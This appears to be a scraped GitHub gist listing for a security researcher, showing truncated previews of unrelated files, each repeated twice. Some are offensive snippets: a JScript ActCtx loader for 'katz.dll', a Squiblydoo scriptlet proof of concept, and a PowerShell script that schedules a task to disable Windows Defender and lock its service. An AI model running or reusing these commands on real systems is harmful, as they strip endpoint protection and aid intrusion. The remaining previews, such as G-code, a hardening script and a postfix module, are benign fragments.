Conor Richard xenoscr

## OlderCode.js
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';

try {

	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> 	<file name="katz.dll">     	<comClass         	description="AllTheThings Class"         	clsid="{89565276-A714-4a43-912E-978BFEEDACDC}"         	threadingModel="Both"         	progid="AllTheThings"/> 	</file>  </assembly>';
	var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
	ax.ManifestText = manifest;
	// Create Base64 Object, supports encode, decode
	var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.

## nt_syscalls.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                xenoscr
                / nt_syscalls.md
            
            
              Created
              November 11, 2021 15:39
                — forked from wbenny/nt_syscalls.md
            
              
                Windows syscall stubs
              
          
    Windows system calls

...by stub

x86

Windows XP

B8 ?? ?? ?? ??                mov     eax, ??
BA 00 03 FE 7F                mov     edx, 7FFE0300h


## How to use a function pointer in VBA.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                xenoscr
                / How to use a function pointer in VBA.md
            
            
              Created
              November 10, 2021 20:32
                — forked from sancarn/How to use a function pointer in VBA.md
            
              
                How to use a function pointer in VBA by Akihito Yamashiro
              
          
    VB6 and VBA come with no support for function pointers.
Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.
These constraints can be avoided by using the DispCallFunc API.
The DispCallFunc is widely used in VB6 when erasing the history of IE.
Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.
As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

  
## rot.py
def rotl(num, bits):
    bit = num & (1 << (bits-1))
    num <<= 1
    if(bit):
        num |= 1
    num &= (2**bits-1)

    return num

def rotr(num, bits):

## squiblytest.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## gist:a9dcee9dff4e442597e97534c905ccb6
; Ender 3 Custom Start G-code
M140 S{material_bed_temperature_layer_0} ; Set Heat Bed temperature
M190 S{material_bed_temperature_layer_0} ; Wait for Heat Bed temperature
M104 S160; start warming extruder to 160
G28 ; Home all axes
G29 ; Auto bed-level (BL-Touch)
G92 E0 ; Reset Extruder
M104 S{material_print_temperature_layer_0} ; Set Extruder temperature
G1 X0.1 Y20 Z0.3 F5000.0 ; Move to start position
M109 S{material_print_temperature_layer_0} ; Wait for Extruder temperature

## Jenkinsfile
@Library('ci-jenkins-common') _

// Jenkins build pipeline (declarative)

// Project:         Seatbelt
// URL:             https://github.com/GhostPack/Seatbelt
// Author:          @tifkin_/@harmj0y
// Pipeline Author: harmj0y

def gitURL = "https://github.com/GhostPack/Seatbelt"

## doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

## windows_hardening.cmd
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
::
::#######################################################################
::
:: Change file associations to protect against common ransomware

## postfix.py
#!/usr/bin/python
import subprocess


DOCUMENTATION = '''
---
module: postfix
short_description: changes postfix configuration parameters
description:
  - The M(postfix) module changes postfix configuration by invoking 'postconf'.
	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';

	try {

	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>';
	var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
	ax.ManifestText = manifest;
	// Create Base64 Object, supports encode, decode
	var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e\|\|0)>>2&63,A=(3&e)<<4\|(t=t\|\|0)>>4&15,o=(15&t)<<2\|(h=h\|\|0)>>6&3,B=63&h;t?h\|\|(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.
	def rotl(num, bits):
	bit = num & (1 << (bits-1))
	num <<= 1
	if(bit):
	num \|= 1
	num &= (2**bits-1)

	return num

	def rotr(num, bits):
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	; Ender 3 Custom Start G-code
	M140 S{material_bed_temperature_layer_0} ; Set Heat Bed temperature
	M190 S{material_bed_temperature_layer_0} ; Wait for Heat Bed temperature
	M104 S160; start warming extruder to 160
	G28 ; Home all axes
	G29 ; Auto bed-level (BL-Touch)
	G92 E0 ; Reset Extruder
	M104 S{material_print_temperature_layer_0} ; Set Extruder temperature
	G1 X0.1 Y20 Z0.3 F5000.0 ; Move to start position
	M109 S{material_print_temperature_layer_0} ; Wait for Extruder temperature
	@Library('ci-jenkins-common') _

	// Jenkins build pipeline (declarative)

	// Project: Seatbelt
	// URL: https://github.com/GhostPack/Seatbelt
	// Author: @tifkin_/@harmj0y
	// Pipeline Author: harmj0y

	def gitURL = "https://github.com/GhostPack/Seatbelt"
	$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

	$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
	Register-ScheduledTask -TaskName 'TestTask' -Action $a

	$svc = New-Object -ComObject 'Schedule.Service'
	$svc.Connect()

	$user = 'NT SERVICE\TrustedInstaller'
	$folder = $svc.GetFolder('\')
	:: Windows 10 Hardening Script
	:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
	:: Thank you @jaredhaight for the Win Firewall config recommendations!
	:: Thank you @ricardojba for the DLL Safe Order Search reg key!
	:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
	::
	::#######################################################################
	::
	:: Change file associations to protect against common ransomware
	#!/usr/bin/python
	import subprocess


	DOCUMENTATION = '''
	---
	module: postfix
	short_description: changes postfix configuration parameters
	description:
	- The M(postfix) module changes postfix configuration by invoking 'postconf'.